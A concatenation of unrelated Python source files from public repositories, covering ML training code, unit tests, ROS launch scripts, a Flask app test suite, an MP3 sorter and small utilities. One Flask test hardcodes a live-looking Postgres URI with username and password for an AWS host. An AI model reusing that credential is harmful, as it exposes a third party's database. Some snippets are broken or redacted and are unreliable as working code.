# [sentence length, batch_size]
x = self.token_embedding(x)
# [sentence length, batch_size, embedding dim]
x = self.pos_encoder(x)
# x = x + self.pos_encoder(positions).expand_as(x)
# [sentence length, batch_size, embedding dim]
output = self.encoder(x)
# [sentence length, batch_size, embedding dim]
avg_out = output.transpose(0, 1).mean(dim=1)
# [batch_size, embedding dim]
preact = self.fc(avg_out)
# [batch_size, num_classes]
# return F.log_softmax(output, dim=-1)
return preact
def per_example_gradient(self, loss):
grads = []
pre_acts = []
pre_acts.extend(self.encoder.collect_preactivations())
pre_acts.append(self.fc.pre_activation)
pre_acts = [m.pre_activ for m in modules]
Z_grad = torch.autograd.grad(loss, pre_acts, retain_graph=True)
for m, zgrad in zip(modules, Z_grad):
m.save_grad(zgrad)
# loss.backward(retain_graph=True)
# TransformerEncoder
grads.extend(self.encoder.per_example_gradient())
# fully connected layer
grads.extend(self.fc.per_example_gradient())
return grads
def pe_grad_norm(self, loss, batch_size, device):
grad_norm = torch.zeros(batch_size, device=device)
pre_acts = []
pre_acts.extend(self.encoder.collect_preactivations())
pre_acts.append(self.fc.pre_activation)
Z_grad = torch.autograd.grad(loss, pre_acts, retain_graph=True)
grad_norm.add_(self.encoder.pe_grad_sqnorm(Z_grad[:-1]))
grad_norm.add_(self.fc.pe_grad_sqnorm(Z_grad[-1]))
grad_norm.sqrt_()
return grad_norm
| 3,377 |
ontology_learning/data_type/knowledge_graph/knowledge_graph_edge.py
|
jromero132/bachelor_thesis_code
| 0 |
2173167
|
from ontology_learning.utils.hash import get_hash
class KnowledgeGraphEdge(object):
def __init__(self, node, label):
self.node = node
self.label = label
def __repr__(self):
return f"KnowledgeGraphEdge(node={self.node}, label={self.label})"
def __str__(self):
return self.__repr__()
def __eq__(self, other):
return self.node == other.node and self.label == other.label
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return get_hash(self.__repr__())
| 502 |
tests/test_ridgepaths.py
|
vishalbelsare/torch-gel
| 37 |
2173096
|
"""test_ridgepaths.py: tests for ridge_paths function."""
import itertools
import unittest
import torch
from scipy.spatial.distance import cosine
from gel.ridgepaths import ridge_paths
class TestRidgePathsEmptySupport(unittest.TestCase):
"""Test ridge_paths with empty support."""
def test_ridge_paths_empty_support(self):
ls = range(5)
summaries = ridge_paths(None, None, None, ls, lambda _, b: b)
self.assertCountEqual(ls, summaries.keys())
for l in ls:
self.assertIsNone(summaries[l])
class TestRidgePathsBase:
"""Base class for ridge_paths tests."""
lambdas = [0.001, 0.01, 0.1, 1.0, 10.0, 100.0, 1000.0]
def __init__(self, device, dtype, m, p, *args, **kwargs):
super().__init__(*args, **kwargs)
self.device = device
self.dtype = dtype
self.m = m
self.p = p
self.support = 1 # this is ignored
def setUp(self):
if self.device.type == "cuda" and not torch.cuda.is_available():
raise unittest.SkipTest("cuda unavailable")
self.X = torch.randn(self.p, self.m, device=self.device, dtype=self.dtype)
self.y = torch.randn(self.m, device=self.device, dtype=self.dtype)
def test_against_naive(self):
"""Compare with directly obtained solution."""
# pylint: disable=no-member
summaries = ridge_paths(
self.X, self.y, self.support, self.lambdas, lambda _, b: b
)
# Compare each b with the naive solution.
I = torch.eye(self.X.shape[0], device=self.device, dtype=self.dtype)
Q = self.X @ self.X.t()
r = self.X @ self.y
for l, b in summaries.items():
b_naive = torch.inverse(Q + l * I) @ r
self.assertAlmostEqual(
cosine(b.cpu().numpy(), b_naive.cpu().numpy()), 0, places=2
)
def create_ridgepaths_test(device_name, dtype, m, p):
device = torch.device(device_name)
def __init__(self, *args, **kwargs):
TestRidgePathsBase.__init__(self, device, dtype, m, p, *args, **kwargs)
_doc = "Test ridge_paths on {} with {} ({}x{})".format(device_name, dtype, m, p)
test_name = "TestRidgePaths" + device_name.upper() + str(dtype)[-2:]
test_name += "_{}x{}".format(m, p)
globals()[test_name] = type(
test_name,
(TestRidgePathsBase, unittest.TestCase),
{"__init__": __init__, "__doc__": _doc},
)
for _device_name, _dtype, _m, _p in itertools.product(
["cpu", "cuda"], [torch.float32, torch.float64], [1, 10], [1, 5, 10, 20]
):
create_ridgepaths_test(_device_name, _dtype, _m, _p)
| 2,642 |
graphgym/contrib/train/train_with_adj.py
|
xnhp/GraphGym
| 0 |
2172218
|
import logging
import time
import torch
from graphgym.checkpoint import load_ckpt, save_ckpt, clean_ckpt
from graphgym.config import cfg
from graphgym.loss import compute_loss
from graphgym.register import register_train
from graphgym.utils.epoch import is_ckpt_epoch
def train_epoch(logger, loader, model, optimizer, scheduler):
model.train()
time_start = time.time()
for batch in loader:
optimizer.zero_grad()
batch.to(torch.device(cfg.device))
pred, true = model(batch)
loss_ret = compute_loss(pred, true, batch)
if len(loss_ret) == 2:
total_loss, pred_score = loss_ret
loss_main = torch.tensor(0)
loss_reg = torch.tensor(0)
else:
total_loss, pred_score, loss_main, loss_reg = loss_ret
total_loss.backward()
optimizer.step()
logger.update_stats(true=true.detach().cpu(),
pred=pred_score.detach().cpu(),
loss=total_loss.item(),
lr=scheduler.get_last_lr()[0],
time_used=time.time() - time_start,
params=cfg.params,
loss_main=loss_main.item(),
loss_reg=loss_reg.item())
time_start = time.time()
scheduler.step()
def eval_epoch(logger, loader, model):
model.eval()
time_start = time.time()
for batch in loader:
batch.to(torch.device(cfg.device))
pred, true = model(batch)
loss_ret = compute_loss(pred, true, batch)
if len(loss_ret) == 2: # todo duplicate code: unpacking of loss values
total_loss, pred_score = loss_ret
loss_main = None
loss_reg = None
else:
total_loss, pred_score, loss_main, loss_reg = loss_ret
logger.update_stats(true=true.detach().cpu(),
pred=pred_score.detach().cpu(),
loss=total_loss.item(),
lr=0,
time_used=time.time() - time_start,
params=cfg.params,
loss_main=loss_main.item(),
loss_reg=loss_reg.item())
time_start = time.time()
def train_with_adj(loggers, loaders, model, optimizer, scheduler):
start_epoch = 0
if cfg.train.auto_resume:
start_epoch = load_ckpt(model, optimizer, scheduler)
if start_epoch == cfg.optim.max_epoch:
logging.info('Checkpoint found, Task already done')
else:
logging.info('Start from epoch {}'.format(start_epoch))
num_splits = len(loggers)
for cur_epoch in range(start_epoch, cfg.optim.max_epoch):
# train and evaluate on train split
train_epoch(loggers[0], loaders[0], model, optimizer, scheduler)
loggers[0].write_epoch(cur_epoch, loaders[0])
if is_ckpt_epoch(cur_epoch):
save_ckpt(model, optimizer, scheduler, cur_epoch)
for logger in loggers:
logger.close()
if cfg.train.ckpt_clean:
clean_ckpt()
logging.info('Task done, results saved in {}'.format(cfg.out_dir))
register_train('train_with_adj', train_with_adj)
| 3,256 |
galeria/__init__.py
|
spanasik/django-galeria
| 0 |
2171727
|
VERSION = (0, 4, 12)
def get_version():
"""Returns the version as a human-format string.
"""
return '.'.join([str(i) for i in VERSION])
__author__ = 'See the file AUTHORS'
__license__ = 'BSD License'
__url__ = 'https://bitbucket.org/semente/django-gallery'
__version__ = get_version()
| 301 |
data/tensorflow/src/2_9_using_variable.py
|
friendlyantz/learning
| 1 |
2171172
|
import tensorflow as tf
sess = tf.InteractiveSession()
raw_data = [1., 2., 8., -1, 0., 5.5, 6., 13]
spike = tf.Variable(False)
spike.initializer.run()
for i in range(1, len(raw_data)):
if raw_data[i] - raw_data[i-1] > 5:
updater = tf.assign(spike, True)
updater.eval()
else:
tf.assign(spike, False).eval()
print("Spike", spike.eval())
sess.close()
| 388 |
tests/test.py
|
mrahman013/Hope4Hops-web-applcation
| 0 |
2172427
|
""" Unit and intergation tests """
import unittest
import hopsapp
from hopsapp import app
from bs4 import BeautifulSoup
from hopsapp.routes import distance
class TestUnitHopsapp(unittest.TestCase):
""" Unit test class """
def setUp(self):
"""
setup for unit test
"""
hopsapp.app.config['TESTING'] = True
self.app = hopsapp.app.test_client()
self.response = self.app.get("/")
def test_home(self):
""" test home status code """
response = self.app.get('/')
self.assertEqual(response.status_code, 200)
#self.assertIn('home', response.data)
def test_about(self):
""" test about page status code """
response = self.app.get('/about')
self.assertEqual(response.status_code, 200)
#self.assertIn('about', response.data)
def test_login(self):
""" test login page status code """
response = self.app.get('/login')
self.assertEqual(response.status_code, 200)
#self.assertIn('login', response.data)
def test_register(self):
""" test register page status code """
response = self.app.get('/register')
self.assertEqual(response.status_code, 200)
#self.assertIn('register', response.data)
def test_beerprofile(self):
""" test beerprofile page status code """
response = self.app.get('/beerprofile?name=Boat')
self.assertEqual(response.status_code, 200)
# self.assertIn('beerprofile', response.data)
def test_breweryprofile(self):
""" test breweryprofile status code """
response = self.app.get('/breweryprofile?name=Carton Brewing Company')
self.assertEqual(response.status_code, 200)
# self.assertIn('breweryprofile', response.data)
def test_storeprofile(self):
""" test storeprofile page status code """
response = self.app.get('/storeprofile?name=Good Beer')
self.assertEqual(response.status_code, 200)
# self.assertIn('storeprofile', response.data)
def test_contact(self):
""" test contact page status code """
response = self.app.get('/contact')
self.assertEqual(response.status_code, 200)
def test_distance_func(self):
""" testing distance function """
self.assertEqual(6.6, distance(40.8200471, -73.9514611, 40.727588, -73.983858))
def test_config_debug(self):
""" testing debug config is true """
assert app.config['DEBUG'] is True
def test_configdb_uri(self):
""" testing DB uri """
assert app.config['SQLALCHEMY_DATABASE_URI'] == 'postgres://yjjuylsytqewni:d0d63322c6abd33e2dadeafd7ef2501f73af54cf2d39596e464ea2c18b0234a3@ec2-23-23-78-213.compute-1.amazonaws.com:5432/d3gdnt7fkmonn1'
def test_config_trackmodification(self):
""" testing trackmodification config is true """
assert app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] is True
def test_error_400(self):
""" test error status """
response = self.app.get('/400')
self.assertEqual(response.status_code, 404)
# self.assertIn('400', response.data)
def test_error_405(self):
""" test error status """
response = self.app.get('/405')
self.assertEqual(response.status_code, 404)
# self.assertIn('405', response.data)
def test_error_500(self):
""" test error status """
response = self.app.get('/500')
self.assertEqual(response.status_code, 404)
# self.assertIn('500', response.data)
class TestIntegration(unittest.TestCase):
""" Integration test class """
def setUp(self):
""" setup for integration test """
hopsapp.app.config['TESTING'] = True
self.app = hopsapp.app.test_client()
self.response = self.app.get("/")
self.soup = BeautifulSoup(self.response.data, 'html.parser')
def test_home_beer_name(self):
""" testing if home is getting beer name from database and
showing on page when page load
"""
response = self.app.get('/')
self.assertIn(b'HEADY TOPPER', response.data)
def test_home_brewery_name(self):
"""
testing if home is getting Brewery name from database
and showing on page when page load
"""
response = self.app.get('/')
self.assertIn(b'CARTON', response.data)
def test_home_beer_style(self):
"""
testing if home is getting beer style from database
and showing on page when page load
"""
response = self.app.get('/')
self.assertIn(b'ALE', response.data)
def test_homebeer_abv(self):
"""
testing if home is getting beer ABV from database
and showing on page when page load
"""
response = self.app.get('/')
self.assertIn(b'6.00%', response.data)
def test_home_beer_rating(self):
"""
testing if home is getting beer rating from database
and showing on page when page load
"""
response = self.app.get('/')
self.assertIn(b'0.0', response.data)
def test_home_beer_rarity(self):
"""
testing if home is getting beer rarity from database
and showing on page when page load
"""
response = self.app.get('/')
self.assertIn(b'COMMON', response.data)
if __name__ == '__main__':
unittest.main()
| 5,469 |
miniml/net.py
|
oniani/miniml
| 3 |
2172994
|
import miniml.tensor as T
import miniml.loss as L
class Model:
def __init__(self):
self._layers: list = []
self._loss: list = []
def add_layer(self, layer):
"""Add a network layer to the model."""
self._layers.append(layer)
def epoch(self, x, y, lr: float):
"""One full epoch."""
# Forward pass through the network
# NOTE: loop by index is needed for saving results
forward: T.Tensor = x
for idx, _ in enumerate(self._layers):
forward = self._layers[idx].forward(x)
x = forward
# Compute loss and first gradient
mse = L.MeanSquaredError(T.Ops.reshape(forward, y.shape), y)
# print(forward.shape, y.shape)
error = mse.forward()
gradient = mse.backward()
self._loss.append(error)
# Backpropagation
for idx, _ in reversed(list(enumerate(self._layers))):
if self._layers[idx].type == "Linear":
gradient, dW, db = self._layers[idx].backward(gradient)
self._layers[idx].optimize(dW, db, lr)
else:
gradient = self._layers[idx].backward(gradient)
return error
def train(self, x_train, y_train, lr: float, epochs: int) -> None:
"""Train the model."""
for epoch in range(epochs):
loss = self.epoch(x_train, y_train, lr)
if epoch % 25 == 0:
print(f"Epoch: {epoch} | Loss: {loss}")
def predict(self, x: T.Tensor) -> T.Tensor:
"""Predict by performing a forward pass on a trained network."""
forward: T.Tensor = x
for idx, _ in enumerate(self._layers):
forward = self._layers[idx].forward(x)
x = forward
return forward
| 1,794 |
book_search/es/documents.py
|
yakky/microservice-talk
| 0 |
2173136
|
from elasticsearch_dsl import Document, InnerDoc, Integer, Keyword, Nested, Text
class Author(InnerDoc):
name: Text()
class Tag(InnerDoc):
title: Text()
slug: Keyword()
class Book(Document):
book_id = Integer()
isbn = Keyword()
isbn13 = Keyword()
authors = Nested(Author)
original_publication_year = Integer()
original_title = Text()
title = Text()
language_code = Keyword()
small_image_url = Keyword()
tags = Nested(Tag)
class Index:
name = "book"
| 520 |
10 Days of Statistics/27 - Day 9 - Multiple Linear Regression.py
|
srgeyK87/Hacker-Rank-30-days-challlenge
| 275 |
2170024
|
# ========================
# Information
# ========================
# Direct Link: https://www.hackerrank.com/challenges/s10-multiple-linear-regression/problem
# Difficulty: Medium
# Max Score: 30
# Language: Python
# ========================
# Solution
# ========================
from sklearn import linear_model
M, N = list(map(int, input().strip().split()))
X = [0]*N
Y = [0]*N
for i in range(N):
inp = list(map(float, input().strip().split()))
X[i] = inp[:-1]
Y[i] = inp[-1]
LM = linear_model.LinearRegression()
LM.fit(X, Y)
A = LM.intercept_
B = LM.coef_
Q = int(input())
for i in range(Q):
f = list(map(float, input().strip().split()))
Y = A + sum([B[j] * f[j] for j in range(M)])
print(round(Y, 2))
| 752 |
unnamed/events/init.py
|
kcomain/unnamed-launcher
| 0 |
2171915
|
# Copyright (c) 2021 kcomain and contributors
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from PySide6.QtCore import QDir
from PySide6.QtCore import QRegularExpression as QRe
from PySide6.QtGui import QRegularExpressionValidator as QReV
from PySide6.QtWidgets import QCompleter, QFileSystemModel
from ..helpers import get_version
from . import BaseEvents
URL_RE = QRe(r"^https?://.+\..{1,63}(/.*)*$")
URL_REV = QReV(URL_RE)
FS_MODEL = QFileSystemModel()
FS_MODEL.setRootPath(QDir.currentPath())
class InitEvents(BaseEvents):
def populate_labels(self):
self.window.info_version.setText(get_version())
def set_validators(self):
self.window.thcrap_starting_text.setValidator(URL_REV)
self.logger.debug("validators set")
def set_completer(self):
np2_completer = QCompleter(FS_MODEL)
thc_completer = QCompleter(FS_MODEL)
np2_completer.setCompletionMode(QCompleter.PopupCompletion)
thc_completer.setCompletionMode(QCompleter.PopupCompletion)
self.window.np2_location_text.setCompleter(np2_completer)
self.window.thcrap_text.setCompleter(thc_completer)
self.logger.debug("completers set")
def run_all(self):
self.populate_labels()
self.set_validators()
self.set_completer()
| 2,323 |
pycolfin/cli.py
|
patpatpatpatpat/pycolfin
| 2 |
2172005
|
# -*- coding: utf-8 -*-
import os
from getpass import getpass
import click
from .pycolfin import COLFin
verbosity_help = """
1 = User ID, Last Login
2 = Display all info from 1 and portfolio summary
3 = Display all info in 1 & 2 and detailed portfolio
"""
use_env_vars_help = """
Use USER_ID and PASSWORD from environment variables.
Not recommended if you are using a shared computer!
(This is like storing bank credentials in a text file)
"""
@click.command()
@click.option('--use-env-vars', is_flag=True, default=False, help=use_env_vars_help)
@click.option('-v', '--verbosity', default=3, type=click.IntRange(1, 3), help=verbosity_help)
def main(verbosity, use_env_vars):
if use_env_vars:
try:
user_id = os.environ['USER_ID']
password = <PASSWORD>['PASSWORD']
except KeyError:
click.echo('USER_ID and PASSWORD not found in environment variables!')
exit()
else:
user_id = getpass(prompt='User ID:')
password = <PASSWORD>(prompt='Password:')
try:
account = COLFin(user_id, password, parser='html.parser')
except Exception as e:
click.echo(e.__str__())
exit()
if verbosity >= 1:
account.fetch_account_summary()
if verbosity >= 2:
account.fetch_portfolio_summary()
account.show_portfolio_summary()
if verbosity == 3:
account.fetch_detailed_portfolio()
try:
account.show_detailed_stocks()
except Exception as e:
print(e)
try:
account.show_detailed_mutual_fund()
except Exception as e:
print(e)
account.show_account_summary()
if __name__ == "__main__":
main()
| 1,719 |
data_analysis/recursive_mean.py
|
antonvs88/crowddynamics-research
| 0 |
2172874
|
import numpy as np
def recursive_mean(data, chunk):
"""
Calculate mean of data array recursively by averaging a "chunk" of the data.
Parameters
----------
data : array, float
Input data
chunk : integer
Size of chunk
Returns
-------
time_sample_average : array
Data array averaged over time.
"""
# Return the largest integer smaller or equal to the division of the first dimension of data array and chunk size.
divider = np.floor_divide(data.shape[0], chunk)
# Computes the remainder complementary to the floor_divide function.
remainder = np.remainder(data.shape[0], chunk)
# Initialize array that is returned.
time_sample_average = np.zeros((data.shape[1], data.shape[2]), dtype=np.float16)
# Calculate mean of data array recursively by taking averaging a "chunk" of the data.
for zzz in range(0,divider+1):
# If remainder only left, calculate take the average of the remainder.
if zzz == divider:
if remainder == 0:
break
elif remainder == 1:
temp_mean = data[chunk * zzz + remainder - 1, :, :]
else:
temp_mean = np.mean(data[chunk * zzz:chunk * zzz + remainder -1, :, :], axis=0, dtype=np.float16)
time_sample_average = (time_sample_average * chunk * zzz + temp_mean * remainder) /\
(chunk * zzz + remainder)
else:
if chunk == 1:
temp_mean = data[chunk * zzz, :, :]
else:
temp_mean = np.mean(data[chunk * zzz:chunk * (zzz+1)-1, :, :], axis=0, dtype=np.float16)
time_sample_average = (time_sample_average * chunk * zzz + temp_mean * chunk) / \
(chunk * (zzz + 1))
return time_sample_average
| 1,869 |
7_funktionen/1_drawBotFunktionen.py
|
Coding-for-the-Arts/drawbot-samples
| 0 |
2172766
|
"""
DrawBot-Funktionen
"""
newPage("1000, 1000")
oval(200, 200, 600, 600)
saveImage("~/Desktop/myImage.pdf")
"""
Dies sind Beispiele für Funktionen, die nur in DrawBot
existieren, aber nicht in Python.
Informationen zu ihnen findest du in der DrawBot-Dokumentation.
https://www.drawbot.com/
"""
| 301 |
multi_fetch_gazebo/scripts/simple_launch.py
|
565353780/multi-fetch-ros
| 0 |
2173131
|
import roslaunch
import rospy
world_name = "world_name:=$(find multi_fetch_gazebo)/worlds/big_livingroom.world"
robot_num = "robot_num:=3"
uuid = roslaunch.rlutil.get_or_generate_uuid(None, False)
roslaunch.configure_logging(uuid)
vpp_cli_args = [
"multi_fetch_gazebo",
"multi_fetch_with_vpp.launch",
world_name,
robot_num,
]
vpp_roslaunch_file = roslaunch.rlutil.resolve_launch_arguments(vpp_cli_args)[0]
vpp_roslaunch_args = vpp_cli_args[2:]
virtual_scan_server_cli_args = ["virtual_scan", "virtual_scan_server.launch"]
virtual_scan_server_roslaunch_file = roslaunch.rlutil.resolve_launch_arguments(
virtual_scan_server_cli_args
)[0]
occupancy_grid_server_cli_args = [
"occupancy_grid_server",
"occupancy_grid_server.launch",
]
occupancy_grid_server_roslaunch_file = roslaunch.rlutil.resolve_launch_arguments(
occupancy_grid_server_cli_args
)[0]
grnet_service_cli_args = ["grnet_detect", "grnet_service.launch"]
grnet_service_roslaunch_file = roslaunch.rlutil.resolve_launch_arguments(
grnet_service_cli_args
)[0]
PointCloud2ToObjectVecConverterServer_cli_args = [
"pointcloud2_to_object_vec_converter",
"PointCloud2ToObjectVecConverterServer.launch",
]
PointCloud2ToObjectVecConverterServer_roslaunch_file = (
roslaunch.rlutil.resolve_launch_arguments(
PointCloud2ToObjectVecConverterServer_cli_args
)
)[0]
ViewPointExtractorServer_cli_args = [
"view_point_extractor",
"ViewPointExtractorServer.launch",
]
ViewPointEcxtractorServer_roslaunch_file = roslaunch.rlutil.resolve_launch_arguments(
ViewPointExtractorServer_cli_args
)[0]
launch_files = [
(vpp_roslaunch_file, vpp_roslaunch_args),
virtual_scan_server_roslaunch_file,
occupancy_grid_server_roslaunch_file,
grnet_service_roslaunch_file,
PointCloud2ToObjectVecConverterServer_roslaunch_file,
ViewPointEcxtractorServer_roslaunch_file,
]
uuid = roslaunch.rlutil.get_or_generate_uuid(None, False)
launch = roslaunch.parent.ROSLaunchParent(uuid, launch_files)
launch.start()
rospy.loginfo("started")
# rospy.sleep()
# 3 seconds later
# launch.shutdown()
try:
launch.spin()
finally:
# After Ctrl+C, stop all nodes from running
launch.shutdown()
| 2,219 |
unmapped/wrapper.py
|
avilab/vs-wrappers
| 1 |
2173279
|
from snakemake.shell import shell
reformat_fastq_extra = snakemake.params.get("reformat_fastq_extra", "")
reformat_fasta_extra = snakemake.params.get("reformat_fasta_extra", "")
extra = snakemake.params.get("extra", "")
# Preprocessing command to run.
commands = [
"reformat.sh in={snakemake.input} out={snakemake.output.fastq} unmappedonly primaryonly {reformat_fastq_extra}",
"reformat.sh in={snakemake.output.fastq} out={snakemake.output.fasta} {reformat_fasta_extra}",
]
# Run preprocessing commands.
for cmd in commands:
shell(cmd)
| 552 |
vision_opencv/opencv_tests/launch/view_img.py
|
zhj-buffer/ROS2-driver-for-Realsense
| 0 |
2169994
|
from launch.legacy.exit_handler import default_exit_handler, restart_exit_handler
from ros2run.api import get_executable_path
def launch(launch_descriptor, argv):
ld = launch_descriptor
package = 'image_tools'
ld.add_process(
cmd=[get_executable_path(package_name=package, executable_name='showimage'),
'-t', '/opencv_tests/images'],
name='showimage',
exit_handler=restart_exit_handler,
)
package = 'opencv_tests'
ld.add_process(
cmd=[get_executable_path(package_name=package, executable_name='source.py')],
name='source.py',
exit_handler=restart_exit_handler,
)
return ld
| 664 |
finder.py
|
araneforseti/newItemFinderScript
| 0 |
2172074
|
#!/usr/bin/python
import sys
def create_list_from_file(file, separator):
new_list = []
with open(file, "r") as ins:
for line in ins:
split = line.split(separator)
if len(split) > 1:
new_list.append(split[1])
return new_list
if len(sys.argv) != 3:
print len(sys.argv)
print sys.argv
sys.exit("Usage: python finder.py <potentialAdditionalList> <knownItemsList>")
potentialItems = create_list_from_file(sys.argv[1], "|")
knownItems = create_list_from_file(sys.argv[2], ",")
newItems = list(set(potentialItems) - set(knownItems))
print "%s new items found" % len(newItems)
for item in newItems:
print item
| 649 |
songsort.py
|
afeldman/songsort
| 0 |
2170926
|
#!/usr/bin/python
import os
import shutil
from tinytag import TinyTag
import argparse
import fnmatch
import uuid
parser = argparse.ArgumentParser()
parser.add_argument("--verbosity", default=0, help="increase output verbosity", type=int)
parser.add_argument("--destination", help="Destination Path")
parser.add_argument("--source", help="Source Path")
args = parser.parse_args()
dest = args.destination
src = args.source
vlevel = args.verbosity
if not os.path.exists(src):
sys.stderr("source path does not exists!!!")
if not os.path.exists(dest):
os.mkdir(dest)
if vlevel > 1:
print("create destination")
mp3files = []
for root, dirs, files in os.walk(src):
for name in fnmatch.filter(files, "*.mp3"):
mp3files.append(os.path.join(root, name))
if vlevel > 1:
print(os.path.join(root, name))
for name in fnmatch.filter(files, "*.Mp3"):
mp3files.append(os.path.join(root, name))
if vlevel > 1:
print(os.path.join(root, name))
for name in fnmatch.filter(files, "*.MP3"):
mp3files.append(os.path.join(root, name))
if vlevel > 1:
print(os.path.join(root, name))
for name in fnmatch.filter(files, "*.mP3"):
mp3files.append(os.path.join(root, name))
if vlevel > 1:
print(os.path.join(root, name))
break
if len(mp3files) == 0:
sys.stderr("Error no mp3 file!")
for mp3file in mp3files:
if vlevel > 1:
print('mp3 file path %s' % mp3file)
try:
tag = TinyTag.get(mp3file)
if vlevel > 2:
print('This track is by %s.' % tag.artist)
print('It is %f seconds long.' % tag.duration)# duration of the song in seconds
print('The album name is %s' % tag.album) # album as string
print('Audio offset %f' % tag.audio_offset) # number of bytes before audio data begins
print('bitrate %f' % tag.bitrate) # bitrate in kBits/s
print('Filesize %f' % tag.filesize) # file size in bytes
print('genre %s' % tag.genre) # genre as string
print('sample rate %f' % tag.samplerate) # samples per second
print('title %s' % tag.title) # title of the song
print('track %s' % tag.track) # track number as string
print('title %s' % str(tag.track_total)) # total number of tracks as string
print('year %s' % str(tag.year)) # year or data as string
if not tag.genre:
tag.genre = "no genre"
if not tag.artist:
tag.artist = "various"
if not tag.album:
tag.album = "no album"
gerpath = os.path.join(dest, tag.genre)
artpath = os.path.join(gerpath, tag.artist)
albpath = os.path.join(artpath, tag.album)
if not os.path.exists(gerpath):
os.mkdir(gerpath)
os.mkdir(artpath)
os.mkdir(albpath)
if vlevel > 1:
print(gerpath)
print(artpath)
print(albpath)
if not os.path.exists(artpath):
os.mkdir(artpath)
os.mkdir(albpath)
if vlevel > 1:
print(artpath)
print(albpath)
if not os.path.exists(albpath):
os.mkdir(albpath)
if vlevel > 1:
print(albpath)
if vlevel > 0:
print("MP3 File is %s" % mp3file)
print("Move to %s" % albpath+"/"+os.path.basename(mp3file))
basename = albpath+"/"+os.path.basename(mp3file)
if not os.path.exists(basename):
shutil.move(mp3file, basename)
else:
shutil.move(mp3file, albpath+"/"+str(uuid.uuid1())+".mp3")
except:
albpath = os.path.join(dest, "unsorted")
if not os.path.exists(albpath+"/"):
os.mkdir(albpath)
n = str(uuid.uuid1())
shutil.move(mp3file, albpath+"/"+n+".mp3")
| 4,059 |
benchmarks/hard_to_optimize_functions/six_hump_camel_2d.py
|
cristianmatache/HOLA
| 10 |
2169570
|
# Copyright 2021 BlackRock, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import cast
import numpy as np
import numpy.typing as npt
def six_hump_camel(x1: float, x2: float) -> float:
"""https://www.sfu.ca/~ssurjano/camel6.html."""
term1 = (4 - 2.1 * np.power(x1, 2) + np.power(x1, 4) / 3) * np.power(x1, 2)
term2 = x1 * x2
term3 = (-4 + 4 * np.power(x2, 2)) * np.power(x2, 2)
return cast(float, term1 + term2 + term3)
def six_hump_camel_np(x: npt.NDArray[np.floating]) -> float:
if len(x) != 2:
raise AssertionError("Exactly 2 items expected")
return six_hump_camel(x[0], x[1])
| 1,130 |
cloudify_deployment_proxy/tests/base.py
|
btcfy/cloudify-utilities-plugin
| 0 |
2172508
|
# Copyright (c) 2017 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
import mock
import testtools
from cloudify.state import current_ctx
from cloudify.mocks import MockCloudifyContext
from cloudify_rest_client.exceptions import CloudifyClientError
REST_CLIENT_EXCEPTION = \
mock.MagicMock(side_effect=CloudifyClientError('Mistake'))
DEPLOYMENT_PROXY_PROPS = {
'resource_config': {
'blueprint': {
'id': '',
'blueprint_archive': 'URL',
'main_file_name': 'blueprint.yaml'
},
'deployment': {
'id': '',
'inputs': {},
'outputs': {
'output1': 'output2'
}
}
}
}
DEPLOYMENT_PROXY_TYPE = 'cloudify.nodes.DeploymentProxy'
class DeploymentProxyTestBase(testtools.TestCase):
def tearDown(self):
current_ctx.clear()
super(DeploymentProxyTestBase, self).tearDown()
def get_mock_ctx(self,
test_name,
test_properties=DEPLOYMENT_PROXY_PROPS,
node_type=DEPLOYMENT_PROXY_TYPE,
retry_number=0):
test_node_id = test_name
test_properties = test_properties
operation = {
'retry_number': retry_number
}
ctx = MockCloudifyContext(
node_id=test_node_id,
deployment_id=test_name,
operation=operation,
properties=test_properties
)
ctx.operation._operation_context = {'name': 'some.test'}
ctx.node.type_hierarchy = ['cloudify.nodes.Root', node_type]
try:
ctx.node.type = node_type
except AttributeError:
ctx.logger.error('Failed to set node type attribute.')
return ctx
| 2,342 |
101-200/141-150/144-BSTPreorderTraversal/BSTPreorderTraversal.py
|
xuychen/Leetcode
| 0 |
2173122
|
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution(object):
def preorderTraversal(self, root):
"""
:type root: TreeNode
:rtype: List[int]
"""
result = []
self.helper(root, result)
return result
def helper(self, node, result):
if node:
result.append(node.val)
self.helper(node.left, result)
self.helper(node.right, result)
| 596 |
test/test_mintest.py
|
dutille/doconce
| 305 |
2173137
|
"""Minimalistic set of unit tests for DocOnce."""
from __future__ import print_function
from builtins import range
# Note: test.verify is a full test, but requires *a lot* of dependencies.
# This test can be run with an install of plain DocOnce code (even not
# preprocess and mako are used).
import os, shutil
def pydiff(text1, text2, text1_name='text1', text2_name='text2',
prefix_diff_files='tmp_diff', n=3):
"""
Use Python's ``difflib`` module to compute the difference
between strings `text1` and `text2`.
